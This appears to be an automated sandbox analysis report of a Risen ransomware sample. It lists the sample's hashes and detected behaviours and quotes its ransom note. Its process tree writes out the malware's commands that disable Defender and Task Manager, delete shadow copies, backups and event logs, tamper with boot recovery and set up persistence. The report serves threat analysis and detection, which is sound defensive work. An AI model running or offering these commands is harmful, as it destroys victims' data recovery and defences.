Analysis

  • max time kernel
    300s
  • max time network
    203s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15/05/2024, 15:52

General

  • Target

    risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe

  • Size

    149KB

  • MD5

    0444b3d690823924667302cfae1f0655

  • SHA1

    737d0d001e60ce20c8f35a2bbac0f4d525b96174

  • SHA256

    3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5

  • SHA512

    5dacf16ce60bb5191708de906a920ab63fa3d5458fc7331013d8c3997beae802f0ea4b318392b1c4c6e15417a15423661e6bb4cb072adb33338493b1aac2c57d

  • SSDEEP

    3072:wz5vBHTp2Obwai/tge32Vhh53u8rrsusAkeOe494flyntoGNout:wtvBlZc/tZ3yh53u8rg/AkFe4ufkntVZ

Malware Config

Extracted

Path

C:\ProgramData\$Risen_Guide.hta

Ransom Note

All Your Important Files Have Been Encrypted

NOTE
We have also taken your critical documents and files from different parts of your network, which we will leak or sell if there is no cooperation from your side. Our operators have been monitoring your business for a while, when we say these documents are critical, we mean it. We await for your response before the deadline ends, After that we will continue the process of leaking or selling your documents. We assure you that this won't happen if you cooperate with us.

CONTACT US
For more instructions, to save your files and your business, contact us by : Email address : [email protected] , TELEGRAM:@tokyosupp didn't get any response in 24 hours ? use : [email protected] Leave subject as your machine id " AAFJKAF8XA " If you didn't get any respond within 72 hours use our blog to contact us, therefore we can create another way for you to contact your cryptor as soon as possible. http://s2wk77h653qn54csf4gp52orhem4y72dgxsquxulf255pcymazeepbyd.onion/

ATTENTION
Do not rename or change info of any file, in case of any changes in files after encryption there is a huge risk for making it unusable Do not pay any amount of money before receiving decrypted test files there might be many middle man services out there whom will contact us for your case and they will make a profit by adding a sort of money to the fixed price any attempts for decrypting your files through third party softwares will cause permanent damage to following files and permanent data loss there will be a deadline until your data get sold or leaked by our team,you better corporate with us before the following deadline otherwise we will proceed to sell or leak your data without any past warnings

URLs

http://s2wk77h653qn54csf4gp52orhem4y72dgxsquxulf255pcymazeepbyd.onion/

Signatures

  • Deletes NTFS Change Journal 2 TTPs 1 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 5 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (3367) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe
    "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe"
    • UAC bypass
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:112
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINESoftware\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      • Suspicious use of WriteProcessMemory
      PID:4028
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINESoftware\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        PID:4940
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      • Suspicious use of WriteProcessMemory
      PID:3192
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        • Modifies Windows Defender Real-time Protection settings
        PID:4516
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      • Suspicious use of WriteProcessMemory
      PID:4840
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
        PID:2872
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
        PID:5048
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      • Suspicious use of WriteProcessMemory
      PID:5020
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
        PID:1044
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
      • Suspicious use of WriteProcessMemory
      PID:408
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
        PID:3956
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      • Suspicious use of WriteProcessMemory
      PID:2232
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
        PID:3084
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
      • Suspicious use of WriteProcessMemory
      PID:4460
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
        PID:3008
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
      • Suspicious use of WriteProcessMemory
      PID:5052
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
        PID:3460
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      • Suspicious use of WriteProcessMemory
      PID:5096
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
        PID:4864
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
        PID:4488
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
      • Suspicious use of WriteProcessMemory
      PID:728
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
        PID:2432
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
        PID:764
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
      • Suspicious use of WriteProcessMemory
      PID:4064
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
        PID:2972
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
      • Suspicious use of WriteProcessMemory
      PID:3820
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
        PID:3020
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
      PID:628
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
        PID:2240
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
      PID:4676
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
        PID:4508
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
      PID:4600
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
        PID:1672
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
      PID:4984
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
        PID:4208
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
      PID:948
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
        PID:212
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
      PID:440
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
        PID:3756
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
      PID:1788
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
        PID:3032
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      PID:2208
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
        PID:1536
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
      PID:1160
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
        PID:3760
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "SystemDefense" /TR "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe" /F
      PID:3536
      • C:\Windows\system32\schtasks.exe
        SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "SystemDefense" /TR "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe" /F
        • Creates scheduled task(s)
        PID:1448
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
      PID:7544
      • C:\Windows\system32\fsutil.exe
        fsutil usn deletejournal /D F:\
        • Enumerates connected drives
        PID:7652
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
      PID:8256
      • C:\Windows\system32\fsutil.exe
        fsutil usn deletejournal /D C:\
        PID:7968
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
      PID:8132
      • C:\Windows\system32\fsutil.exe
        fsutil usn deletejournal /D M:\
        • Enumerates connected drives
        PID:9108
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
      PID:7496
      • C:\Windows\system32\wevtutil.exe
        wevtutil.exe cl Setup
        • Clears Windows event logs
        • Suspicious use of AdjustPrivilegeToken
        PID:6968
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
      PID:8112
      • C:\Windows\system32\wevtutil.exe
        wevtutil.exe cl System
        • Clears Windows event logs
        • Suspicious use of AdjustPrivilegeToken
        PID:7852
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
      PID:8068
      • C:\Windows\system32\wevtutil.exe
        wevtutil.exe cl Application
        • Clears Windows event logs
        • Suspicious use of AdjustPrivilegeToken
        PID:8664
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
      PID:6528
      • C:\Windows\system32\wevtutil.exe
        wevtutil.exe cl Security
        • Clears Windows event logs
        • Suspicious use of AdjustPrivilegeToken
        PID:5700
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
      PID:7568
      • C:\Windows\system32\wevtutil.exe
        wevtutil.exe cl Security /e:false
        • Clears Windows event logs
        • Suspicious use of AdjustPrivilegeToken
        PID:8104
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
      PID:6808
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /all /quiet
        • Interacts with shadow copies
        PID:8016
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
      PID:628
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        • Modifies boot configuration data using bcdedit
        PID:7924
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      PID:7996
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                  3⤵
                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                  PID:8328
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                2⤵
                                                                                                  PID:6460
                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                    fsutil.exe usn deletejournal /D C:
                                                                                                    3⤵
                                                                                                    • Deletes NTFS Change Journal
                                                                                                    PID:8312
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                  2⤵
                                                                                                    PID:8528
                                                                                                    • C:\Windows\system32\wbadmin.exe
                                                                                                      wbadmin.exe delete catalog -quiet
                                                                                                      3⤵
                                                                                                      • Deletes backup catalog
                                                                                                      PID:8660
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                    2⤵
                                                                                                      PID:7868
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                        3⤵
                                                                                                          PID:7688
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "SystemDefense" /F
                                                                                                        2⤵
                                                                                                          PID:7732
                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                            SCHTASKS.exe /Delete /TN "SystemDefense" /F
                                                                                                            3⤵
                                                                                                              PID:7572
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                            2⤵
                                                                                                              PID:8036
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                3⤵
                                                                                                                  PID:5680
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                2⤵
                                                                                                                  PID:7668
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                    3⤵
                                                                                                                      PID:6672
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WELCOME " /f
                                                                                                                    2⤵
                                                                                                                      PID:8292
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WELCOME " /f
                                                                                                                        3⤵
                                                                                                                          PID:2056
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " We have penetrated your whole network due some critical security issues. We have encrypted all files on each host in the network , We have also Took your critical data AND in case of NO corporation until the end of the deadline we WILL leak or sell your data, the only way to stop this process is successful corporation. ([email protected] , TELEGRAM:@tokyosupp) AND :([email protected]) " /f
                                                                                                                        2⤵
                                                                                                                          PID:7976
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " We have penetrated your whole network due some critical security issues. We have encrypted all files on each host in the network , We have also Took your critical data AND in case of NO corporation until the end of the deadline we WILL leak or sell your data, the only way to stop this process is successful corporation. ([email protected] , TELEGRAM:@tokyosupp) AND :([email protected]) " /f
                                                                                                                            3⤵
                                                                                                                              PID:9008
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
                                                                                                                            2⤵
                                                                                                                              PID:8228
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill /IM mshta.exe /f
                                                                                                                                3⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:7608
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\$Risen_Note.txt
                                                                                                                              2⤵
                                                                                                                                PID:8224
                                                                                                                                • C:\Windows\system32\notepad.exe
                                                                                                                                  notepad.exe C:\ProgramData\$Risen_Note.txt
                                                                                                                                  3⤵
                                                                                                                                    PID:4960
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c C:\ProgramData\$Risen_Guide.hta
                                                                                                                                  2⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:8416
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\$Risen_Guide.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                    3⤵
                                                                                                                                      PID:3612
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 1408
                                                                                                                                        4⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:8756
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:8272
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping 127.0.0.1 -n 5
                                                                                                                                        3⤵
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:5064
                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4424
                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:8332
                                                                                                                                  • C:\Windows\system32\wbengine.exe
                                                                                                                                    "C:\Windows\system32\wbengine.exe"
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:9208
                                                                                                                                  • C:\Windows\System32\vdsldr.exe
                                                                                                                                    C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:8908
                                                                                                                                    • C:\Windows\System32\vds.exe
                                                                                                                                      C:\Windows\System32\vds.exe
                                                                                                                                      1⤵
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      PID:7468
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3612 -ip 3612
                                                                                                                                      1⤵
                                                                                                                                        PID:6080

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\$Risen_Guide.hta
  Filesize: 4KB
  MD5: 3ed8e52fe434b5f056aabc805d384013
  SHA1: 8f2c23dc76105af341cf883954aeb2be60e37cce
  SHA256: 599cc4620b50d256167e3936c38f4a542e756edd5ec85f1cc9cddc1182c14b02
  SHA512: 7a1fbd852c1442e2ca5d729bb7e3b9884e54cbd33916dbe86ac0426b44a1b491850a1a2557b1e72931f201347e1acb4a9a2c947630e683763d0deda9ac301e81

• C:\ProgramData\$Risen[AAFJKAF8XA].Private
  Filesize: 1KB
  MD5: 6a1974f71093b501fd7f9e074b0474ec
  SHA1: ea480c2e6639b061fdf54d4214ecb432415e3369
  SHA256: 63f686ea4f8a13a6f1b2242386c1c2ad943996697ed46d6f9237fdab17681c16
  SHA512: e09c316bf67f594413c6a9d70b9f6eff91ed5a24b377a5b7c82209cdf9e314bce10d338b098452071be822293b7b8287d655457f1db9a977f539cfdab849d081

• C:\ProgramData\$Risen_Guide.hta
  Filesize: 7KB
  MD5: 4149ced50d1167ca531bcd43484eed96
  SHA1: cfce8bad09e6947f9982549b07e44888ac8d9e08
  SHA256: 277d2352139f0955a018dcf5252ec4ee726418f331eea260d83aa4c9dcc40a8e
  SHA512: 52bbc9a60917ada5ab8909ab083bc13e01e2fb83cf8f748539c0db136a8c8199687d394a41e223d390ef3c94fdf511e1e55d250829cbef587135de1712f02bbf

• C:\ProgramData\$Risen_Note.txt
  Filesize: 1KB
  MD5: d50d9d7af7389b37ddd2d4e9ee1c68c0
  SHA1: 6cb8d45479c45920cd46ccf9c65417f00955431b
  SHA256: ce9f27e0748409fba2fee29f39a8fb49eabefbff980358374d77a71c5a9944d8
